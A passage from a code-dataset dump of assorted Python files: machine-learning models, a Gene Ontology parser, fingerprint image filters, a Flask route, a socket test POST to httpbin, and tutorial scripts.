self.__class__.__name__ + str(postfix)\n attrs = self.__dict__\n annos = self.__annotations__\n anno_attr = {key: (annos[key], attrs[key]) for key in attrs.keys() if key in annos}\n new_dir = path / name\n create_safely(new_dir)\n return [dispatch_saver(value, new_dir / attr_name) for attr_name, (cls, value) in anno_attr.items()]\n\n\ndef _load_(cls, path: Path, postfix: str):\n name = cls.__name__ + str(postfix)\n annos = cls.__annotations__\n new_dir = path / name\n kwargs_loaded = {attr_name: dispatch_loader(attr_cls, new_dir / attr_name)\n for attr_name, attr_cls in annos.items()}\n return cls(**kwargs_loaded)\n\n\ndef dump(self, path: Path, postfix: str=''):\n \"\"\"\n Roughly, this functions saves @dataclass-annotated object into object.__class__.__name__ folder\n Args:\n path: path to save data\n data: any @dataclass - decorated class\n postfix: str, postfix # TODO: or callable\n\n Returns:\n list of str/None, depends on saver return type\n \"\"\"\n return self._dump_(path, postfix)\n\n\ndef load(cls, path: Path, postfix: str=''):\n \"\"\"\n Load dumped object\n Args:\n cls:\n path:\n postfix:\n\n Returns:\n Any savable/loadable object\n \"\"\"\n return cls._load_(path, postfix)\n\n\ndef databox(_cls=None, *, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False):\n \"\"\"\n decorator which adds save and load methods to the @dataclass - decorated classes\n Args:\n _cls: class to decorate\n init: whether implement or not __init__\n repr: ... __repr__\n eq: ... __eq__\n order: ... comparison methods\n unsafe_hash: ... __hash__\n frozen:\n\n Returns:\n Decorated class _cls\n \"\"\"\n data_cls = dataclass(_cls=_cls, init=init, repr=repr, eq=eq, order=order,\n unsafe_hash=unsafe_hash, frozen=frozen)\n data_cls = type(data_cls.__name__, (data_cls,),\n {'_load_': classmethod(_load_), '_dump_': _dump_,\n 'load': classmethod(load), 'dump': dump})\n return data_cls\n\n\ndef purge():\n raise NotImplementedError\n\n\n","sub_path":"databox/data_model.py","file_name":"data_model.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387767887","text":"import nltk\nfrom nltk.corpus import state_union\nfrom nltk.tokenize import PunktSentenceTokenizer\n\ntrain_text = state_union.raw(\"2005-GWBush.txt\")\nsample_text = \"Hey ,pracheta is speaking to puchka .\\nHow are you Siddhi?\\nI'm good puchka\"\n\n\ncustom_sent_tokenizer = PunktSentenceTokenizer(train_text)\nprint(type(custom_sent_tokenizer))\ntokenized = custom_sent_tokenizer.tokenize(sample_text)\nprint (tokenized)\n\ndef process_content():\n try:\n for i in tokenized:\n words = nltk.word_tokenize(i)\n tagged = nltk.pos_tag(words)\n\n \n \n ch=r\"\"\"Chunk: {<.*>+}\n }+{ \"\"\"\n chParser=nltk.RegexpParser(ch)\n chunked=chParser.parse(tagged)\n print(chunked)\n chunked.draw()\n \n \n except Exception as e:\n print(str(e))\n\nprocess_content()\n","sub_path":"Basics/Chinking.py","file_name":"Chinking.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518306959","text":"import socket\n\n# TCP/IP socket\nsock_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nsock_obj.connect(('httpbin.org', 80))\nsock_obj.send(\"\"\"POST /post HTTP/1.1\nHost: httpbin.org\nAccept: */*\n\n{\n \"github\": \"MyNickName\",\n \"Name\": \"MyName\",\n \"Surname\": \"MySurname\"\n}\\n\\n\"\"\")\n\nresp = sock_obj.recv(1024)\nprint(resp)\n\n# Close the 
connection when completed\nsock_obj.close()","sub_path":"fortcdump.py","file_name":"fortcdump.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29113425","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Author: Guewen Baconnier\n# Copyright 2014 Camptocamp SA\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom yuancloud.osv import orm\n\n\nclass sale_order(orm.Model):\n _inherit = 'sale.order'\n\n def _prepare_payment_move_line(self, cr, uid, move_name, sale, journal,\n period, amount, date, context=None):\n debit_line, credit_line = super(sale_order, self).\\\n _prepare_payment_move_line(cr, uid, move_name, sale, journal,\n period, amount, date, context=context)\n if sale.transaction_id:\n debit_line['transaction_ref'] = sale.transaction_id\n credit_line['transaction_ref'] = sale.transaction_id\n return debit_line, credit_line\n","sub_path":"yuancloud/extend/sale_payment_method_transaction_id/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112577011","text":"#!/usr/bin/python2\nfrom __future__ import print_function\n\nimport parse_obonet as opy2\nimport networkx\nimport pronto\nimport csv\nfrom cStringIO import StringIO\nimport gzip\n\n\"\"\"\nSignificant portion of the following code has been extracted from Daniel Himmelstein's\nGene-Ontology GitHub Page: https://github.com/dhimmel/gene-ontology\n\"\"\"\n\nbprocess_trnsl = {\"biological_process\":\"BiologicalProcess\",\n \"molecular_function\":\"MolecularFunction\",\n \"cellular_component\":\"CellularComponent\"}\n\nremove_subsets = {\n 'goantislim_grouping', # Grouping classes that can be excluded\n 'gocheck_do_not_annotate' # Term not to be used for direct annotation\n 'gocheck_do_not_manually_annotate', # Term not to be used for direct manual annotation\n}\n\npropagate_along = {'is_a', 'part_of'}\n\ndef get_go_annotations(obo_filename, gene2go_gz):\n graph = opy2.read_obo_file(obo_filename)\n print (networkx.info(graph))\n \n for u, v, key in graph.edges(data=False, keys=True):\n if key not in propagate_along:\n graph.remove_edge(u, v, key)\n\n remove_nodes = set()\n for node, data in graph.nodes(data=True):\n if remove_subsets & set(data.get('subset', [])):\n remove_nodes.add(node)\n\n print (networkx.info(graph))\n \n with gzip.open(gene2go_gz, 'rb') as f:\n g2g_file_content = f.read()\n\n dict_go = make_dict(g2g_file_content)\n\n for node, data in graph.nodes_iter(data=True):\n for annot in 'inferred_annotations', 'direct_annotations', 'direct_not_annotations':\n data[annot] = set()\n\n for go_id, gene_arr in dict_go.iteritems():\n for gene in gene_arr:\n gene_id = 
gene.split(\"|\")[0]\n            qual = gene.split(\"|\")[1]\n            if go_id not in graph:\n                continue\n            \n            if qual != \"NOT\":\n                graph.node[go_id]['direct_annotations'].add(gene_id)\n            else:\n                graph.node[go_id]['direct_not_annotations'].add(gene_id)\n\n    propagate_annotations(graph)\n\n    cat_dict = make_category_dict(obo_filename)\n\n    fin_dict = {}\n    for node, data in graph.nodes_iter(data=True):\n        if node in remove_nodes:\n            continue\n        else:\n            full_gene_set = data['inferred_annotations']|data['direct_annotations']\n            fin_dict[node] = {\"genes\":full_gene_set,\n                              \"type\":bprocess_trnsl[cat_dict[node]]}\n\n    return fin_dict\n\ndef process_annotations_spoke(ann_dict, obo_file, gene2go_gz, category):\n    with gzip.open(gene2go_gz, 'rb') as f:\n        g2g_file_content = f.read()\n    \n    go_obo = pronto.Ontology(obo_file)\n    evi_dict = get_evidence(g2g_file_content)\n\n    node_dict = dict()\n    rel_dict = dict()\n\n    count_rels = 0\n    count_gene_all = 0\n\n    for ago in ann_dict.keys():\n        gene_arr = ann_dict[ago][\"genes\"]\n        if ann_dict[ago][\"type\"] == category:\n            if len(gene_arr) > 1 and len(gene_arr) < 1001:\n                count_rels = count_rels + len(list(set(gene_arr)))\n                for g in gene_arr:\n                    cat_id = str(g.split(\"|\")[0]) + \"|\" + ago\n                    count_gene_all += 1\n                    if cat_id in evi_dict.keys():\n                        evidence = evi_dict[cat_id]\n                    else:\n                        evidence = \"Inferred\"\n                    rel_dict[cat_id] = {\"evidence\":evidence,\n                                        \"source\":\"NCBI gene2go\"}\n                desc = str(go_obo[ago].desc)\n                for replace in '\"', '\\\\':\n                    desc = desc.replace(replace, \"\")\n                url = \"http://purl.obolibrary.org/obo/\" + ago.replace(\"GO:\", \"GO_\")\n                node_dict[ago] = {\"name\":go_obo[ago].name,\n                                  \"desc\":desc,\n                                  \"url\":url}\n    return node_dict, rel_dict, count_rels\n    \ndef propagate_annotations(graph):\n    \"\"\"Infer annotations through propagations\"\"\"\n    for node in networkx.topological_sort(graph):\n        data = graph.node[node]\n        inferred = data['inferred_annotations']\n        inferred -= data['direct_not_annotations']\n        inferred |= data['direct_annotations']\n        for subsuming_node in graph.successors(node):\n            subsuming_data = graph.node[subsuming_node]\n            subsuming_data['inferred_annotations'] |= inferred\n\ndef make_category_dict(obo_file):\n    cat_dict = dict()\n    go_obo = pronto.Ontology(obo_file)\n    for term in go_obo:\n        go_id = term.id\n        go_cat = term.other['namespace'][0]\n        cat_dict[go_id] = go_cat\n    return cat_dict\n\ndef get_evidence(gene2go):\n    open_g2g = StringIO(gene2go)\n    next(open_g2g)\n    ev_dict = dict()\n\n    reader = csv.reader(open_g2g, delimiter='\\t')\n    for line in reader:\n        if line[0].strip() == '9606':  # column 0 is the tax_id, as in make_dict below\n            gene_id = line[1].strip()\n            go_id = line[2].strip()\n            concat_id = gene_id + \"|\" + go_id\n            evidence = line[3].strip()\n            ev_dict[concat_id] = evidence\n    return ev_dict\n\ndef make_dict(g2g_file, type_go=None):\n    dict_go = dict()\n    open_g2g = StringIO(g2g_file)\n    reader = csv.reader(open_g2g, delimiter = '\\t')\n    for line in reader:\n        # line[0].strip() == \"9606\" and\n        if type_go:\n            if line[0].strip() == '9606' and line[7].strip() == type_go:\n                go_id = line[2].strip()\n                gene_id = line[1].strip() + \"|\" + line[4].upper().strip()\n                if not go_id in dict_go:\n                    dict_go[go_id] = [gene_id]\n                else:\n                    dict_go[go_id].append(gene_id)\n        else:\n            if line[0].strip() == '9606':\n                go_id = line[2].strip()\n                gene_id = line[1].strip() + \"|\" + line[4].upper().strip()\n                if not go_id in dict_go:\n                    dict_go[go_id] = [gene_id]\n                else:\n                    dict_go[go_id].append(gene_id)\n    return dict_go\n","sub_path":"update/parsers/Make_GO_Annotations_rbvi.py","file_name":"Make_GO_Annotations_rbvi.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +
{"seq_id":"40614332","text":"import random\nfrom strategy import Strategy\n\n\nclass StrategyMinimax(Strategy):\n    ''' Interface to suggest moves via a depth-limited minimax-style search.\n    '''\n\n    def suggest_move(self, state, depth=3):\n        moves = state.possible_next_moves()\n        max_outcome = -10000\n        suggest_move = None\n        for move in moves:\n            if state.apply_move(move).over:\n                return move\n            minimax_outcome = self.minimax_outcome(state, move, p=state.next_player, level=1, depth=depth)\n            if minimax_outcome > max_outcome:\n                max_outcome = minimax_outcome\n                suggest_move = move\n        return suggest_move\n\n\n    def minimax_outcome(self, state, move, p, level=1, depth=3):\n        if level > depth:\n            return 0\n        next_state = state.apply_move(move)\n        if next_state.over:\n            if next_state.next_player == p:\n                return next_state.outcome()\n            else:\n                return -next_state.outcome()\n        moves = next_state.possible_next_moves()\n        total_outcome = 0\n        for new_move in moves:\n            # propagate the depth limit instead of silently resetting it to the default\n            total_outcome += self.minimax_outcome(next_state, new_move, p=p, level=level+1, depth=depth)\n        return total_outcome\n\n","sub_path":"tippy_minimax/strategy_minimax.py","file_name":"strategy_minimax.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491170906","text":"##2 How do boys and girls perform across states?\r\nimport pandas as pd\r\nimport numpy as nump\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"nas-labels.csv\")#read labels\r\npupil = pd.read_csv(\"nas-pupil-marks.csv\")#read marks\r\nboy = 1\r\ngirl = 2\r\n#print df[['Level', 'Rename']]\r\nd = {i[0]: i[1] for i in nump.array(df[['Level', 'Rename']])}\r\n#print d\r\narr = nump.array(df[['Column', 'Level', 'Rename']])\r\n#print arr\r\nstate = {i[1]: i[2] for i in arr if(i[0] == 'State')}\r\n#print state\r\nperf = nump.array(pupil[['State', 'Gender', 'Maths %', 'Reading %', 'Science %', 'Social %']])\r\n#print perf\r\nmarks = {}\r\nboys = []\r\ngirls = []\r\nfor i in state:\r\n    add1 = 0.0\r\n    add2 = 0.0\r\n    for j in perf:\r\n        if j[0] == i:\r\n            if(j[1]==boy):\r\n                if nump.isnan(j[2]) == False : add1 = add1 + j[2]#check if the value is a number\r\n                if nump.isnan(j[3]) == False : add1 = add1 + j[3]\r\n                if nump.isnan(j[4]) == False : add1 = add1 + j[4]\r\n                if nump.isnan(j[5]) == False : add1 = add1 + j[5]\r\n\r\n            elif (j[1] == girl):
\r\n                if nump.isnan(j[2]) == False : add2 = add2 + j[2]\r\n                if nump.isnan(j[3]) == False : add2 = add2 + j[3]\r\n                if nump.isnan(j[4]) == False : add2 = add2 + j[4]\r\n                if nump.isnan(j[5]) == False : add2 = add2 + j[5]\r\n\r\n    boys.append(add1)\r\n    girls.append(add2)\r\n#print boys\r\nx1 = [2*n for n in range(33)]\r\ny1 = boys\r\nx2 = [2*n+1 for n in range(33)]\r\ny2 = girls\r\nplt.plot(x1, y1, label='Boys', color='r')#plot a line of boys across states\r\nplt.plot(x2, y2, label='Girls', color='c')#plot a line of girls across states\r\nplt.legend()\r\nplt.show()","sub_path":"boys_girls.py","file_name":"boys_girls.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"514538063","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Web interface based on flask\"\"\"\n\n\nimport os\nfrom datetime import date, timedelta\nfrom flask import Flask, redirect, url_for\nfrom opas.hypermark import text as d2h_text\n\n\napp = Flask('OPAS-Web-Interface')\n\n@app.route('/report/')\n@app.route('/report/<sprint_name>')\ndef daily_report(sprint_name=None):\n    sprint_name = sprint_name or str(date.today())\n    year, month, day = list(map(int, sprint_name.split('-')))\n    filename = 'summaries/%04d/%02d/sprint-%s.md' % (year, month, sprint_name)\n    fullname = 'opas/static/%s' % filename\n    if os.path.isfile(fullname):\n        return d2h_text(open(fullname).read()).html\n    else:\n        return \"[OPAS] Sprint report doesn't exist or the name is invalid!
\"\n\n\ndef start_flask():\n app.run(debug=True)\n\n","sub_path":"opas/webif_flask.py","file_name":"webif_flask.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562447585","text":"from common.weights import Initializer\nfrom models.cyclegan.layers import ConvBlock\nfrom models.cyclegan.layers import ConvTransposeBlock\nfrom models.cyclegan.layers import LeakyConvBlock\nfrom models.cyclegan.layers import ResidualBlock\nimport torch\nimport torch.nn as nn\n\nclass Generator(nn.Module):\n def __init__(self, in_channels, out_channels, filters=64, residual_layers=9,\n dropout=False, skip=False, init_type='normal',\n init_scale=0.02):\n super(Generator, self).__init__()\n\n self.tanh = nn.Tanh()\n self.skip = skip\n\n # Encoder\n self.encoder = nn.Sequential(\n ConvBlock(\n in_channels, filters, kernel_size=7, stride=1, padding=3),\n ConvBlock(\n filters, filters * 2, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 2, filters * 4, kernel_size=3, stride=2, padding=1))\n\n # Transformer\n self.transformer = nn.Sequential(\n *[ResidualBlock(filters * 4, kernel_size=3, stride=1, padding=1,\n dropout=dropout) for _ in range(residual_layers)])\n\n # Decoder\n self.decoder = nn.Sequential(\n ConvTransposeBlock(\n filters * 4, filters * 2, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 2, filters, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvBlock(\n filters, out_channels, kernel_size=7, stride=1, padding=3,\n relu=False))\n\n # Generator\n self.net = nn.Sequential(self.encoder, self.transformer, self.decoder)\n\n # Initialize weights\n init_weights = Initializer(init_type, init_scale)\n for module in self.net.modules():\n init_weights(module)\n\n def forward(self, x):\n if self.skip:\n return self.tanh(self.net(x) + x)\n else:\n return self.tanh(self.net(x))\n\nclass VAEGenerator(nn.Module):\n def __init__(self, size, in_channels, out_channels, filters=64, z_size=256,\n hidden_layers=2, hidden_size=384, init_type='xavier',\n init_scale=0.02):\n super(VAEGenerator, self).__init__()\n\n assert size == 128 or size == 256 or size == 512\n\n self.size = size\n\n # Encoder\n self.encoder = nn.Sequential(\n ConvBlock(\n in_channels, filters, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters, filters, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters, filters * 2, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 2, filters * 2, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 2, filters * 4, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 4, filters * 4, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 4, filters * 8, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 8, filters * 8, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 8, filters * 8, kernel_size=3, stride=2, padding=1),\n nn.MaxPool2d(size // 16),\n nn.Flatten(),\n nn.Linear(2 * 2 * filters * 8, int(hidden_size)),\n nn.ReLU(True),\n *[nn.Sequential(\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(True)) for _ in range(hidden_layers)])\n\n self.calculate_mu = nn.Linear(hidden_size, z_size)\n self.calculate_logvar = nn.Linear(hidden_size, z_size)\n self.resize = nn.Linear(z_size, size * size // 64)\n\n # Decoder\n self.decoder = nn.Sequential(\n ConvTransposeBlock(\n 1, filters * 8, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 8, 
filters * 4, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 4, filters * 2, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 2, filters, kernel_size=3, stride=1, padding=1),\n ConvTransposeBlock(\n filters, out_channels, kernel_size=3, stride=1, padding=1))\n\n def reparameterize(self, mu, logvar, training=True):\n if training:\n sigma = logvar.mul(0.5).exp_()\n return torch.normal(mu, sigma)\n else:\n return mu\n\n def sample(self, z):\n after = self.resize(z)\n after = after.view((-1, 1, self.size // 8, self.size // 8))\n return self.decoder(after)\n\n def forward(self, x):\n before = self.encoder(x)\n mu = self.calculate_mu(before)\n logvar = self.calculate_logvar(before)\n z = self.reparameterize(mu, logvar)\n return self.sample(z), z, mu, logvar\n","sub_path":"models/cyclegan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509879258","text":"\n#import stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport sys\nimport math\nfrom PIL import Image\n\ndef projsum(im, imcen, h, the, x):\n\tstart = np.array([math.floor(imcen + math.cos(the)*x), math.floor(imcen + math.sin(the)*x)]) #where to start summing\n\tdiff = np.array([math.cos(the+math.pi/2),math.sin(the+math.pi/2)]) #sum direction by angle\n\n\tres = int(im[start[0],start[1]]) #start value\n\tfor i in range(1,h): # do the sum\n\t\tres = res + int(im[math.floor(start[0] + i*diff[0]), math.floor(start[1] + i*diff[1])])\n\t\tres = res + int(im[math.floor(start[0] - i*diff[0]), math.floor(start[1] - i*diff[1])])\n\treturn res #return result\n\ndef imagearray_to_RFimage(im):\n\timgsize=im.shape[0]\n\timgcenter = math.ceil(imgsize/2)\n\tw = math.floor(imgsize/2)-1 #sum width\n\th = math.floor(0.5*0.9*math.sqrt(imgsize)) #sum height\n\tposcount = 4*w\n\tanglecount = 100\n\n\tx = np.linspace(-math.pi/2,math.pi/2,anglecount) # angle coordinates\n\ty = np.linspace(-w,w,poscount)\t# position coordinates\n\txv,yv = np.meshgrid(x,y)\t# coordinate matrices\n\tres = np.zeros(xv.shape)\t\t#initialize result matrix\n\n\tfor i in range(0,poscount):\n\t\tif i%10==0:\n\t\t\tsys.stdout.write('in line %i of %i \\r' % (i,poscount))\n\t\t\tsys.stdout.flush()\n\t\tfor j in range(0,anglecount):\n\t\t\tres[i,j] = (projsum(im,imgcenter,h,xv[i,j],yv[i,j]))/(2*h+1)\n\treturn([xv,yv,res,w,h,imgsize])\n\ndef RFimage_to_plot(RFI, OIM, outname): # input [xv,yv,res,w,h,size], OriginalIMageArray, string outname\n\tplt.figure(figsize=(20,10))\n\tplt.subplot(1,2,1)\n\tplt.title('original image')\n\tplt.axis('equal')\n\tplt.pcolormesh(OIM, cmap='gray', vmin=0, vmax=255)\n\n\tplt.subplot(1,2,2)\n\tplt.pcolormesh(RFI[0],RFI[1],RFI[2] , cmap='gray')\n\tplt.title('Ridge frequency image, w=%i pixels, h=%i pixels' % (RFI[3],RFI[4]))\n\tplt.axis([RFI[0].min(), RFI[0].max(), RFI[1].min(), RFI[1].max()])\n\tplt.xlabel('Angle in Radians')\n\tplt.ylabel('Position in Pixels')\n#\tplt.show()\n\tplt.savefig('out/'+ outname + '.png' )\n\ndef plotRF(im,outname):\n\tRFimage_to_plot(imagearray_to_RFimage(im), im, outname)\n\ndef RF_over_Image(im,sz,outname):\n\tfor xpos in range(0,im.shape[0]-sz,sz):\n\t\tfor ypos in range(0,im.shape[1]-sz,sz):\n\t\t\tplotRF(im[xpos:xpos+sz,ypos:ypos+sz], outname+'_'+str(xpos)+' '+str(ypos))\n\ndef matconvolve(L,R):\n\tres = np.zeros(R.shape)\n\tfor i in range(0,R.shape[0]):\n\t\tfor j in 
range(0,R.shape[1]):\n\t\t\tval = 0\n\t\t\tfor k in range(0,L.shape[0]):\n\t\t\t\tfor l in range(0,L.shape[1]):\n\t\t\t\t\tif i+k-1 in range(0,R.shape[0]): #only good for L of size 3x3...\n\t\t\t\t\t\tif j+l-1 in range(0,R.shape[1]):\n\t\t\t\t\t\t\tval = val + L[k,l]*R[i+k-1,j+l-1]\n\t\t\tres[i,j] = val\n\treturn res\n\ndef findblockori(im):\n\tGx=np.array([[-1,0,1],[-2,0,2],[-1,0,1]]) # sobel stuff\n\tGy=np.array([[-1,-2,-1],[0,0,0],[1,2,1]]) \n#do convolutions\n\timGx=matconvolve(Gx,im) #xgradient\n\timGy=matconvolve(Gy,im) #ygradient\n\timGg=np.sqrt(Gx*Gx+Gy*Gy) #gradient magnitude\n#overall orientation:\n\tgyy = np.sum(2*imGx*imGy)\n\tgxx = np.sum(imGx*imGx-imGy*imGy)\n#\tprint('gxx=%f and gyy=%f' % (gxx,gyy))\n\ttheta = 0.25*math.pi\n\tif gxx != 0: theta = 0.5*math.atan(gyy/gxx)\n\treturn theta\n\ndef backmask(im):\n\trsz = 16 #rastersize\n\tbxsz = 16 #box size for evaluating finger\n\tthreshold = np.sum(im)/im.shape[0]/im.shape[1]\n\tbckg = np.zeros(im.shape) \n\tfor i in range(0,im.shape[0],rsz):\n\t\tfor j in range(0,im.shape[1],rsz):\n\t\t\tarea=min([bxsz,im.shape[0]-i])*min([bxsz,im.shape[1]-j])\n\t\t\tif np.sum(im[i:min([i+bxsz,im.shape[0]]),j:min([j+bxsz,im.shape[1]])]) < threshold*area:\n\t\t\t\tfor k in range(i,min([i+rsz,im.shape[0]])):\n\t\t\t\t\tfor l in range(j,min([j+rsz,im.shape[1]])):\t\t\t\t\t\t\n\t\t\t\t\t\tbckg[k,l]= 1\n\treturn bckg\n\n\ndef orientationmap(im):\n\tprint(im.shape)\n\trsz = 3 #rastersize\n\tbxsz = 8 #box size for finding orientation\n\tori = np.zeros(im.shape)\n\tfor i in range(0,im.shape[0],rsz):\n\t\tfor j in range(0,im.shape[1],rsz):\n\t\t\tiend=min([i+bxsz,im.shape[0]])\n\t\t\tjend=min([j+bxsz,im.shape[1]])\n\t\t\ttheta = findblockori(im[i:iend,j:jend])\n\t\t\tfor k in range(i,min([i+rsz,im.shape[0]])):\n\t\t\t\tfor l in range(j,min([j+rsz,im.shape[1]])):\n\t\t\t\t\tori[k,l]= theta\n\t\t\tsys.stdout.write('orientation raster line %i row %i val %f.\\r' % (i, j, theta))\n\t\t\tsys.stdout.flush()\n\treturn ori\n\t\ndef plottwoarrays(A,B):\n\tplt.figure(figsize=(20,10))\n\tplt.subplot(1,2,1)\n\tplt.title('left image')\n\tplt.axis('equal')\n\tplt.pcolormesh(A, cmap='gray')\n\n\tplt.subplot(1,2,2)\n\tplt.pcolormesh(B , cmap='gray')\n\tplt.axis('equal')\n#\tplt.show()\n\tplt.savefig('twoplot.png' )\n\n#===================\n#MAIN\n#===================\n\nimage = Image.open('input.tif') \t\t\t\t\t\t#import image\nim = np.array(image) \t\t\t\t\t\t\t\t#convert image to numpy\nprint('image size ' +str(im.shape))\n\nres = Image.fromarray(im)\t\t\t\t\t\t\t#save orignal\nres = res.convert('RGB')\nres.save('original.png')\n\nim_sm = matconvolve(np.array([[1/9,1/9,1/9],[1/9,1/9,1/9],[1/9,1/9,1/9]]),im)\t\t#smoothing\nres = Image.fromarray(im_sm)\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth.png')\n\nim_smw = matconvolve((np.array([[1/16,2/16,1/16],[2/16,4/16,2/16],[1/16,2/16,1/16]])),im)\t#smoothing (weighted)\nres = Image.fromarray(im_smw)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_w.png')\n\nim_xso = matconvolve((np.array([[-1,0,1],[-2,0,2],[-1,0,1]])),im)\t\t\t\t#sobel x\nres = Image.fromarray(im_xso)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_x.png')\n\nim_yso = matconvolve((np.array([[-1,-2,-1],[0,0,0],[1,2,1]])),im)\t\t\t\t#sobel y\nres = Image.fromarray(im_yso)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_y.png')\n\nim_gmag = np.sqrt(im_xso*im_xso + im_yso*im_yso)\nres = Image.fromarray(im_gmag)\t\t\t\t\t\t\t\t\t#saving\nres = 
res.convert('RGB')\nres.save('sobel_mag.png')\n\n\n\n\n\n#==============\n\nres = Image.fromarray(im[250:275,260:285])\t\t\t\t\t\t\t#save original\nres = res.convert('RGB')\nres.save('original_cut.png')\nres = Image.fromarray(im_sm[250:275,260:285])\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_cut.png')\nres = Image.fromarray(im_smw[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_w_cut.png')\nres = Image.fromarray(im_xso[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_x_cut.png')\nres = Image.fromarray(im_yso[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_y_cut.png')\nres = Image.fromarray(im_gmag[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_mag_cut.png')\n\n#[250:275,260:285]\n","sub_path":"Vorlesungen/fingerprint/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609279236","text":"# A few “infinite” iterators provided by itertools\n# Everything the itertools module provides are functions that handle iteration; their return values are not lists but Iterators, which are only actually evaluated when iterated over with a for loop\nimport itertools\n\nnatural = itertools.count(1)\nfor n in natural:\n print(n)\n if n > 100:\n break\n\n# count() creates an infinite iterator, so the code above prints the sequence of natural numbers\n\n# cycle() repeats the sequence passed to it endlessly\ncs = itertools.cycle('ABC')\n'''\nfor c in cs:\n print(c)\n'''\n\n# repeat() repeats a single element endlessly, but providing a second argument limits the number of repetitions\nns = itertools.repeat('A', 3)\nfor n in ns:\n print(n)\n\n\"\"\"\nAn infinite sequence only iterates endlessly inside a for loop; merely creating the iterator object does not generate the infinite elements in advance, and in fact it would be impossible to create infinitely many elements in memory.\nAlthough an infinite sequence can be iterated forever, we usually use functions such as takewhile() to cut out a finite sequence based on a condition\n\"\"\"\nnaturals = itertools.count(1)\nns = itertools.takewhile(lambda x: x <= 10, naturals)\nprint(list(ns))\n\n\"\"\"\nchain()\nchain() strings a group of iterables together, forming one larger iterator\n\"\"\"\nfor c in itertools.chain('abc', 'xyz'):\n print(c)\n\n\"\"\"\ngroupby()\ngroupby() picks out adjacent repeated elements in an iterator and puts them together\n\"\"\"\nfor key, group in itertools.groupby('AAABBBCCAAA'):\n print(key, list(group))\n'''\nA ['A', 'A', 'A']\nB ['B', 'B', 'B']\nC ['C', 'C']\nA ['A', 'A', 'A']\n'''\n# The grouping rule is actually implemented by a function: whenever the function returns equal values for two elements, those two elements are considered to belong to the same group,\n# and the function's return value serves as the group key. If we want to group while ignoring case, we can simply make the elements 'A' and 'a' return the same key\nfor key, group in itertools.groupby('AaaBBbcCAAa', lambda c: c.upper()):\n print(key, list(group))\n'''\nA ['A', 'a', 'a']\nB ['B', 'B', 'b']\nC ['c', 'C']\nA ['A', 'A', 'a']\n'''\n","sub_path":"src/day0122/exercise016_itertools.py","file_name":"exercise016_itertools.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541426976","text":"# -*- coding: utf-8 -*- \n\"\"\" \n------------------------------------------------- 